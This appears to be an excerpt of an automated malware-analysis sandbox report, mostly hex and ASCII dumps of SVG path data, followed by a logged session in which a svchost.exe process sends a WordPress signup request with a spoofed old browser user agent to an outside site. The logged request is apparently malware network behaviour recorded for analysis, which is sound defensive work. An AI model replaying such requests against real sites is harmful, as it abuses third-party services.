                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:55 UTC1931INData Raw: 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 36 32 2c 32 36 39 2e 33 39 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 2c 32 36 30 2e 37 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30
                                                                                                                                                                                                                                                                                                      Data Ascii: 66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M785.62,269.39a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.19,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M785.7,260.71a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:55 UTC1947INData Raw: 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 33 36 2c 33 33 30 2e 34 36 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 34 34 2c 33 32 31 2e 37 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37
                                                                                                                                                                                                                                                                                                      Data Ascii: ath class="cls-9" d="M820.36,330.46a2.16,2.16,0,0,1-1.09,2.76,3.17,3.17,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M820.44,321.78a2.16,2.16,0,0,1-1.1,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.7
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:55 UTC1963INData Raw: 3d 22 4d 38 35 35 2e 31 2c 33 39 31 2e 35 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 35 35 2e 31 37 2c 33 38 32 2e 38 36 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c
                                                                                                                                                                                                                                                                                                      Data Ascii: ="M855.1,391.54a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M855.17,382.86a2.15,2.15,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:55 UTC1979INData Raw: 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 38 39 2e 39 31 2c 34 34 33 2e 39 33 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 2f 3e 3c
                                                                                                                                                                                                                                                                                                      Data Ascii: .09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.64,2.64,0,0,1,0,3.57"/><path class="cls-9" d="M889.91,443.93a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.8-3.58,2.8,2.8,0,0,1,3.61.2,2.64,2.64,0,0,1,0,3.57"/><
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:55 UTC1995INData Raw: 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 38 2c 32 36 31 2e 38 39 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c
                                                                                                                                                                                                                                                                                                      Data Ascii: 6,0,0,1-1.1,2.75,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.61.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M918,261.89a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:55 UTC2011INData Raw: 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 35 32 2e 37 32 2c 33 32 33 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c
                                                                                                                                                                                                                                                                                                      Data Ascii: 4,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.19,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M952.72,323a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"/><path class="cl
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:55 UTC2027INData Raw: 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 2e 38 37 2c 32 36 30 2e 34 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 2e 35 38 2c 32 35 31 2e 36 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31
                                                                                                                                                                                                                                                                                                      Data Ascii: 84,2.84,0,0,1,3.66,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M59.87,260.41a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M59.58,251.63a2.19,2.19,0,0,1-1
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:55 UTC2043INData Raw: 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 39 37 2e 33 33 2c 33 31 31 2e 38 37 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d
                                                                                                                                                                                                                                                                                                      Data Ascii: 18,0,0,1-4.22-1.19,3,3,0,0,1,.65-3.66,2.84,2.84,0,0,1,3.66.05,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M97.33,311.87a2.17,2.17,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class=
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:55 UTC2091INData Raw: 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 37 2e 38 35 2c 31 32 36 2e 36 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 37 2e 35 36 2c 31 31 37 2e 38 33 61 32 2e 31 39 2c 32 2e 31 39
                                                                                                                                                                                                                                                                                                      Data Ascii: 66,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M117.85,126.61a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.67,2.67,0,0,1,.19,3.61"/><path class="cls-7" d="M117.56,117.83a2.19,2.19
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:55 UTC2107INData Raw: 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 35 35 2e 36 31 2c 31 38 36 2e 38 36 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 35 35
                                                                                                                                                                                                                                                                                                      Data Ascii: -1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M155.61,186.86a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.2,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M155
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:55 UTC2123INData Raw: 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 39 33 2e 33 37 2c 32 34 37 2e 31 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 39 33 2e 30 37 2c 32 33 38 2e 33 32 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c
                                                                                                                                                                                                                                                                                                      Data Ascii: 7,2.67,0,0,1,.19,3.61"/><path class="cls-7" d="M193.37,247.1a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M193.07,238.32a2.18,2.18,0,0,1-1,2.83,3.18,3.18,
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:55 UTC2139INData Raw: 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 33 31 2e 31 32 2c 33 30 37 2e 33 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32
                                                                                                                                                                                                                                                                                                      Data Ascii: -1.19,3,3,0,0,1,.65-3.65,2.84,2.84,0,0,1,3.66,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M231.12,307.35a2.16,2.16,0,0,1-1,2.82,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M2
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:55 UTC2155INData Raw: 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 35 31 2e 36 34 2c 31 32 32 2e 30 38 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22
                                                                                                                                                                                                                                                                                                      Data Ascii: 22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M251.64,122.08a2.17,2.17,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:55 UTC2171INData Raw: 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 38 39 2e 34 2c 31 38 32 2e 33 33 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d
                                                                                                                                                                                                                                                                                                      Data Ascii: ,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M289.4,182.33a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"/><path class=
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:55 UTC2187INData Raw: 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 32 37 2e 31 36 2c 32 34 32 2e 35 37 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f
                                                                                                                                                                                                                                                                                                      Data Ascii: ,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.87,2.87,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M327.16,242.57a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:55 UTC2203INData Raw: 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 36 34 2e 39 31 2c 33 30 32 2e 38 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d
                                                                                                                                                                                                                                                                                                      Data Ascii: 3.18,0,0,1-4.22-1.2,3,3,0,0,1,.65-3.65,2.84,2.84,0,0,1,3.66,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M364.91,302.82a2.17,2.17,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class=


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      19192.168.2.55366283.223.113.46443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC267OUTGET /wp-signup.php?new=magicomm.co.uk HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: dataform.co.uk
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:07 UTC665INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Cache-Control: must-revalidate, no-cache, max-age=0
                                                                                                                                                                                                                                                                                                      Keep-Alive: timeout=2, max=100
                                                                                                                                                                                                                                                                                                      Content-Length: 48940
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                      Server: Apache
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Headers: mobileappversionnumber, x-requested-with
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                      X-Powered-By: PHP/7.0.29
